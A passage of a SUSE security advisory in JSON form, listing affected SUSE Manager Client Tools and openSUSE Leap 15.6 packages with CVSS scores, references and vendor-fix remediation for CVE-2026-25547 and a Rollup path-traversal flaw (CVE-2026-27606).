"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2026-25547"
},
{
"cve": "CVE-2026-27606",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-27606"
}
],
"notes": [
{
"category": "general",
"text": "Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-27606",
"url": "https://www.suse.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "SUSE Bug 1258846 for CVE-2026-27606",
"url": "https://bugzilla.suse.com/1258846"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
